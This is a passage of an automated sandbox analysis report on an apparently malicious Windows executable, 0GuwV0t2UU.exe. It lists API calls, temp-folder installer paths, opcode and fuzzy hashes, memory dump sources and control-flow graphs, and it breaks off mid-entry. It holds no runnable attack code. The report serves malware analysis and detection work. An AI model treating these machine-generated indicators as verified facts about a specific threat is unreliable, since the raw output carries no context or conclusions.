                                                        • Instruction ID: 37941c8e81507efb3cd3a011d4506580e18aa69eefbcae33377864b38d05d7c2
                                                        • Opcode Fuzzy Hash: fbda1c126528e77f8eb1d19cbf263a4f79599cb979c26f3e0093e3aefe43dd94
                                                        • Instruction Fuzzy Hash: 83F0F061D8061199DA31F6584C40E7766BCEB54360B06803BEA02B32C1D7BC88E182DA
                                                        APIs
                                                        • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403652,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040394F,?,00000008,0000000A,0000000C), ref: 00405F77
                                                        • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403652,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040394F,?,00000008,0000000A,0000000C), ref: 00405F81
                                                        • lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405F93
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F71
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: CharPrevlstrcatlstrlen
                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                        • API String ID: 2659869361-3936084776
                                                        • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                        • Instruction ID: 335bc096d8d08ccdb4617666140afd44cda2f442d884a3fcf06d2b2a94fa9456
                                                        • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                        • Instruction Fuzzy Hash: 42D0A731101A34EAC2117B448C04CDF629C9F46344341483BF101B31A1CB7D5DA287FD
                                                        APIs
                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 738B1171
                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 738B11E3
                                                        • GlobalFree.KERNEL32 ref: 738B124A
                                                        • GlobalFree.KERNEL32(?), ref: 738B129B
                                                        • GlobalFree.KERNEL32(00000000), ref: 738B12B1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3172815841.00000000738B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 738B0000, based on PE: true
                                                        • Associated: 00000000.00000002.3172732409.00000000738B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000000.00000002.3173096944.00000000738B4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000000.00000002.3173194995.00000000738B6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_738b0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: Global$Free$Alloc
                                                        • String ID:
                                                        • API String ID: 1780285237-0
                                                        • Opcode ID: dee48cfe48bf8ad773c1dd6ce8404cf095e789ed32d0e43434f4c8b112fbd822
                                                        • Instruction ID: 5a5b2a21fd6b0d6e8f759e26ed046129e70597922e4ea3ab3f50b68e0da11b5c
                                                        • Opcode Fuzzy Hash: dee48cfe48bf8ad773c1dd6ce8404cf095e789ed32d0e43434f4c8b112fbd822
                                                        • Instruction Fuzzy Hash: 7F514BB6500607DFE701EFA9C885B167BBBEB09715B144229E94ADF350FB38AD01CB50
                                                        APIs
                                                        • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsiBDD8.tmp\System.dll), ref: 004026BA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: lstrlen
                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsiBDD8.tmp$C:\Users\user\AppData\Local\Temp\nsiBDD8.tmp\System.dll
                                                        • API String ID: 1659193697-678874282
                                                        • Opcode ID: 0b41287631d18e2d28a56846eef1e8605d4441d913272003cd6f8d0be4e33a07
                                                        • Instruction ID: 3a980f7409dbeac528cd7030d6b505637954cb723df09773b9ac7431f40d283a
                                                        • Opcode Fuzzy Hash: 0b41287631d18e2d28a56846eef1e8605d4441d913272003cd6f8d0be4e33a07
                                                        • Instruction Fuzzy Hash: BD11EB72B00206A7CB00BBB18E4AA9E77659F50758F21443FF502B61D0DAFD8991635E
                                                        APIs
                                                        • CloseHandle.KERNEL32(000002E8,C:\Users\user\AppData\Local\Temp\,00403BB5,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403C94
                                                        • CloseHandle.KERNEL32(000002F4,C:\Users\user\AppData\Local\Temp\,00403BB5,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403CA8
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00403C87
                                                        • C:\Users\user\AppData\Local\Temp\nsiBDD8.tmp, xrefs: 00403CB8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsiBDD8.tmp
                                                        • API String ID: 2962429428-2286101407
                                                        • Opcode ID: aee73ed6a062803200b229e34675cefdb9ab84dda1d90898f0442dcc956d8ee4
                                                        • Instruction ID: 6bfdaf564fb6f4d857381f61ee43f4b3e7b9b57b480fcef53b70eb5bee5fd527
                                                        • Opcode Fuzzy Hash: aee73ed6a062803200b229e34675cefdb9ab84dda1d90898f0442dcc956d8ee4
                                                        • Instruction Fuzzy Hash: ADE0863150471896D5346F7CAF4D9853B185F413357258327F078F20F0C738D95A5AAD
                                                        APIs
                                                        • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00403161,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\0GuwV0t2UU.exe,C:\Users\user\Desktop\0GuwV0t2UU.exe,80000000,00000003), ref: 00405FC3
                                                        • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00403161,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\0GuwV0t2UU.exe,C:\Users\user\Desktop\0GuwV0t2UU.exe,80000000,00000003), ref: 00405FD3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: CharPrevlstrlen
                                                        • String ID: C:\Users\user\Desktop
                                                        • API String ID: 2709904686-3125694417
                                                        • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                        • Instruction ID: 38d9290afe44bb03d7cf08b54fe4d5b58535dca9612c3dc8604b8734ddeb262b
                                                        • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                        • Instruction Fuzzy Hash: 3AD05EB2411921DAD3126704DD01D9F77ACEF12300746482AE440A7161D7785C8186AC
                                                        APIs
                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406107
                                                        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 0040611F
                                                        • CharNextA.USER32(00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406130
                                                        • lstrlenA.KERNEL32(00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406139
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                        • String ID:
                                                        • API String ID: 190613189-0
                                                        • Opcode ID: 95544cd0fbc1c68b6442233ab1bb13ea59abf9e1bd9498eecabbd7b85e38d71d
                                                        • Instruction ID: 5f3436636367d0d5bc92f6b0e419d408aad35ecbe6557c54d873c5627a92c34c
                                                        • Opcode Fuzzy Hash: 95544cd0fbc1c68b6442233ab1bb13ea59abf9e1bd9498eecabbd7b85e38d71d
                                                        • Instruction Fuzzy Hash: E4F0BB35604414FFC702DFA5DD00D9EBBA8EF46350B2640B9F841FB211D674DE129B99

                                                        Execution Graph

                                                        Execution Coverage:0%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:100%
                                                        Total number of Nodes:1
                                                        Total number of Limit Nodes:0
                                                        execution_graph 79763 37932df0 LdrInitializeThunk

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1 379335c0-379335cc LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: c8a7d26a526e1db9744a3dfecbcce3c9894eec1d0ba076c16a5b46d9eeff31fa
                                                        • Instruction ID: 2c5c85dd8f95e4307fd227a4b68def2825dba6c94f94eb3c414d3afd289bb7c6
                                                        • Opcode Fuzzy Hash: c8a7d26a526e1db9744a3dfecbcce3c9894eec1d0ba076c16a5b46d9eeff31fa
                                                        • Instruction Fuzzy Hash: 7390027260560412D100B1588528B06100947D0205F65C552E0424568E87D98A5575A2

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 37932df0-37932dfc LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 4bc90c9dcbf5c18d888f3893d337956adfcdb1569e596b3ad4466e7792f9435b
                                                        • Instruction ID: 888a7631bbff1f13d08e552f326624e96fb259294af42290dd10c8a2f3127cbd
                                                        • Opcode Fuzzy Hash: 4bc90c9dcbf5c18d888f3893d337956adfcdb1569e596b3ad4466e7792f9435b
                                                        • Instruction Fuzzy Hash: 8690027220150423D111B1588518B07000D47D0245F95C553E0424558E969A8A56B121

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 553 379994e0-37999529 554 37999578-37999587 553->554 555 3799952b-37999530 553->555 556 37999534-3799953a 554->556 557 37999589-3799958e 554->557 555->556 558 37999540-37999564 call 37939020 556->558 559 37999695-379996bd call 37939020 556->559 560 37999d13-37999d27 call 37934c30 557->560 567 37999593-37999634 GetPEB call 3799dc65 558->567 568 37999566-37999573 call 379b972b 558->568 569 379996dc-37999712 559->569 570 379996bf-379996da call 37999d2a 559->570 579 37999652-37999667 567->579 580 37999636-37999644 567->580 581 3799967d-37999690 RtlDebugPrintTimes 568->581 571 37999714-37999716 569->571 570->571 571->560 575 3799971c-37999731 RtlDebugPrintTimes 571->575 575->560 587 37999737-3799973e 575->587 579->581 583 37999669-3799966e 579->583 580->579 582 37999646-3799964b 580->582 581->560 582->579 585 37999670 583->585 586 37999673-37999676 583->586 585->586 586->581 587->560 589 37999744-3799975f 587->589 590 37999763-37999774 call 3799a808 589->590 593 3799977a-3799977c 590->593 594 37999d11 590->594 593->560 595 37999782-37999789 593->595 594->560 596 379998fc-37999902 595->596 597 3799978f-37999794 595->597 598 37999908-37999937 call 37939020 596->598 599 37999a9c-37999aa2 596->599 600 379997bc 597->600 601 37999796-3799979c 597->601 615 37999939-37999944 598->615 616 37999970-37999985 598->616 604 37999af4-37999af9 599->604 605 37999aa4-37999aad 599->605 602 379997c0-37999811 call 37939020 RtlDebugPrintTimes 600->602 601->600 606 3799979e-379997b2 601->606 602->560 642 37999817-3799981b 602->642 610 37999ba8-37999bb1 604->610 611 37999aff-37999b07 604->611 605->590 609 37999ab3-37999aef call 37939020 605->609 612 379997b8-379997ba 606->612 613 379997b4-379997b6 606->613 636 37999ce9 609->636 610->590 617 37999bb7-37999bba 610->617 619 37999b09-37999b0d 611->619 620 37999b13-37999b3d call 37998513 611->620 612->602 613->602 621 3799994f-3799996e 615->621 622 37999946-3799994d 615->622 626 37999991-37999998 616->626 627 37999987-37999989 616->627 623 37999c7d-37999cb4 call 37939020 617->623 624 37999bc0-37999c0a 617->624 619->610 619->620 639 37999d08-37999d0c 620->639 640 37999b43-37999b9e call 37939020 RtlDebugPrintTimes 620->640 635 379999d9-379999f6 RtlDebugPrintTimes 621->635 622->621 651 37999cbb-37999cc2 623->651 652 37999cb6 623->652 633 37999c0c 624->633 634 37999c11-37999c1e 624->634 629 379999bd-379999bf 626->629 637 3799998b-3799998d 627->637 638 3799998f 627->638 643 3799999a-379999a4 629->643 644 379999c1-379999d7 629->644 633->634 645 37999c2a-37999c2d 634->645 646 37999c20-37999c23 634->646 635->560 667 379999fc-37999a1f call 37939020 635->667 647 37999ced 636->647 637->626 638->626 639->590 640->560 685 37999ba4 640->685 653 3799986b-37999880 642->653 654 3799981d-37999825 642->654 648 379999ad 643->648 649 379999a6 643->649 644->635 657 37999c39-37999c7b 645->657 658 37999c2f-37999c32 645->658 646->645 656 37999cf1-37999d06 RtlDebugPrintTimes 647->656 661 379999af-379999b1 648->661 649->644 659 379999a8-379999ab 649->659 662 37999ccd 651->662 663 37999cc4-37999ccb 651->663 652->651 666 37999886-37999894 653->666 664 37999852-37999869 654->664 665 37999827-37999850 call 37998513 654->665 656->560 656->639 657->656 658->657 659->661 668 379999bb 661->668 669 379999b3-379999b5 661->669 670 37999cd1-37999cd7 662->670 663->670 664->666 672 37999898-379998ef call 37939020 RtlDebugPrintTimes 665->672 666->672 683 37999a3d-37999a58 667->683 684 37999a21-37999a3b 667->684 668->629 669->668 676 379999b7-379999b9 669->676 677 37999cd9-37999cdc 670->677 678 37999cde-37999ce4 670->678 672->560 689 379998f5-379998f7 672->689 676->629 677->636 678->647 686 37999ce6 678->686 687 37999a5d-37999a8b RtlDebugPrintTimes 683->687 684->687 685->610 686->636 687->560 691 37999a91-37999a97 687->691 689->639 691->617
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: $ $0
                                                        • API String ID: 3446177414-3352262554
                                                        • Opcode ID: c25d8494c052dab9af06f5809a3dc31f9ea99c54740af2b59352a0395ec1a302
                                                        • Instruction ID: a69283c8cf541cf81509bd8078a5f4e6567efab37f8f580950d0f53557623455
                                                        • Opcode Fuzzy Hash: c25d8494c052dab9af06f5809a3dc31f9ea99c54740af2b59352a0395ec1a302
                                                        • Instruction Fuzzy Hash: 053206B16083418FE310CF68C984B9BBBE9BBC9368F044A2DF59987350D775E949CB52

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1296 379a0274-379a0296 call 37947e54 1299 379a0298-379a02b0 RtlDebugPrintTimes 1296->1299 1300 379a02b5-379a02cd call 378e76b2 1296->1300 1304 379a0751-379a0760 1299->1304 1305 379a02d3-379a02e9 1300->1305 1306 379a06f7 1300->1306 1308 379a02eb-379a02ee 1305->1308 1309 379a02f0-379a02f2 1305->1309 1307 379a06fa-379a074e call 379a0766 1306->1307 1307->1304 1310 379a02f3-379a030a 1308->1310 1309->1310 1312 379a0310-379a0313 1310->1312 1313 379a06b1-379a06ba GetPEB 1310->1313 1312->1313 1315 379a0319-379a0322 1312->1315 1317 379a06d9-379a06de call 378eb970 1313->1317 1318 379a06bc-379a06d7 GetPEB call 378eb970 1313->1318 1320 379a033e-379a0351 call 379a0cb5 1315->1320 1321 379a0324-379a033b call 378fffb0 1315->1321 1323 379a06e3-379a06f4 call 378eb970 1317->1323 1318->1323 1331 379a035c-379a0370 call 378e758f 1320->1331 1332 379a0353-379a035a 1320->1332 1321->1320 1323->1306 1335 379a05a2-379a05a7 1331->1335 1336 379a0376-379a0382 GetPEB 1331->1336 1332->1331 1335->1307 1337 379a05ad-379a05b9 GetPEB 1335->1337 1338 379a03f0-379a03fb 1336->1338 1339 379a0384-379a0387 1336->1339 1342 379a05bb-379a05be 1337->1342 1343 379a0627-379a0632 1337->1343 1344 379a04e8-379a04fa call 379027f0 1338->1344 1345 379a0401-379a0408 1338->1345 1340 379a0389-379a03a4 GetPEB call 378eb970 1339->1340 1341 379a03a6-379a03ab call 378eb970 1339->1341 1355 379a03b0-379a03d1 call 378eb970 GetPEB 1340->1355 1341->1355 1347 379a05dd-379a05e2 call 378eb970 1342->1347 1348 379a05c0-379a05db GetPEB call 378eb970 1342->1348 1343->1307 1352 379a0638-379a0643 1343->1352 1367 379a0590-379a059d call 379a11a4 call 379a0cb5 1344->1367 1368 379a0500-379a0507 1344->1368 1345->1344 1351 379a040e-379a0417 1345->1351 1366 379a05e7-379a05fb call 378eb970 1347->1366 1348->1366 1358 379a0438-379a043c 1351->1358 1359 379a0419-379a0429 1351->1359 1352->1307 1360 379a0649-379a0654 1352->1360 1355->1344 1385 379a03d7-379a03eb 1355->1385 1362 379a044e-379a0454 1358->1362 1363 379a043e-379a044c call 37923bc9 1358->1363 1359->1358 1369 379a042b-379a0435 call 379adac6 1359->1369 1360->1307 1361 379a065a-379a0663 GetPEB 1360->1361 1370 379a0682-379a0687 call 378eb970 1361->1370 1371 379a0665-379a0680 GetPEB call 378eb970 1361->1371 1373 379a0457-379a0460 1362->1373 1363->1373 1397 379a05fe-379a0608 GetPEB 1366->1397 1367->1335 1376 379a0509-379a0510 1368->1376 1377 379a0512-379a051a 1368->1377 1369->1358 1394 379a068c-379a06ac call 379986ba call 378eb970 1370->1394 1371->1394 1383 379a0472-379a0475 1373->1383 1384 379a0462-379a0470 1373->1384 1376->1377 1387 379a0538-379a053c 1377->1387 1388 379a051c-379a052c 1377->1388 1395 379a0477-379a047e 1383->1395 1396 379a04e5 1383->1396 1384->1383 1385->1344 1391 379a053e-379a0551 call 37923bc9 1387->1391 1392 379a056c-379a0572 1387->1392 1388->1387 1398 379a052e-379a0533 call 379adac6 1388->1398 1410 379a0563 1391->1410 1411 379a0553-379a0561 call 3791fe99 1391->1411 1403 379a0575-379a057c 1392->1403 1394->1397 1395->1396 1402 379a0480-379a048b 1395->1402 1396->1344 1397->1307 1404 379a060e-379a0622 1397->1404 1398->1387 1402->1396 1408 379a048d-379a0496 GetPEB 1402->1408 1403->1367 1409 379a057e-379a058e 1403->1409 1404->1307 1413 379a0498-379a04b3 GetPEB call 378eb970 1408->1413 1414 379a04b5-379a04ba call 378eb970 1408->1414 1409->1367 1416 379a0566-379a056a 1410->1416 1411->1416 1420 379a04bf-379a04dd call 379986ba call 378eb970 1413->1420 1414->1420 1416->1403 1420->1396
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                        • API String ID: 3446177414-1700792311
                                                        • Opcode ID: 8285095658bc4c3ba8271821eb7eb281b4f40b85e87224e81cf1da1e1f9eef62
                                                        • Instruction ID: 1d934b04c6c49a641ac143861605052b9cce143771aa6ffb651aa023d0caade3
                                                        • Opcode Fuzzy Hash: 8285095658bc4c3ba8271821eb7eb281b4f40b85e87224e81cf1da1e1f9eef62
                                                        • Instruction Fuzzy Hash: 52D1FD35902689DFDB41CF6CC440AADBBF9FF0A318F068259E4459BB22E739A841CF11
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
